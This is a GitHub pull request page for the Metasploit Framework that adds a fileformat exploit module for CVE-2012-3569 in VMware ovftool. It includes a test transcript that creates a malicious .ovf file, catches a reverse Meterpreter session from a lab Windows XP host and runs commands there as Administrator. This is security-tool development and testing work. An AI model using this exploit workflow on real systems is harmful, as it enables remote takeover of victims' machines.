Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added module for cve-2012-3569, fileformat version #1439

Merged

Conversation

jvazquez-r7
Copy link
Contributor

The resulting file must be parsed by the victim with ovftool:

ovftool msf.ovf

Test:

msf > use exploit/windows/fileformat/ovf_format_string 
msf  exploit(ovf_format_string) > rexploit
[*] Reloading module...

[*] Creating 'msf.ovf'. This files should be opened with VMMWare OVF 2.1
[+] msf.ovf stored at /Users/juan/.msf4/local/msf.ovf
msf  exploit(ovf_format_string) > use exploit/multi/handler 
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:1105) at 2013-02-04 16:49:49 +0100

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.147 - Meterpreter session 1 closed.  Reason: User exit
msf  exploit(handler) > 

@wchen-r7 wchen-r7 merged commit 135718a into rapid7:master Feb 5, 2013
@jvazquez-r7 jvazquez-r7 deleted the ovftool_format_string_fileformat branch November 18, 2014 15:53
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

2 participants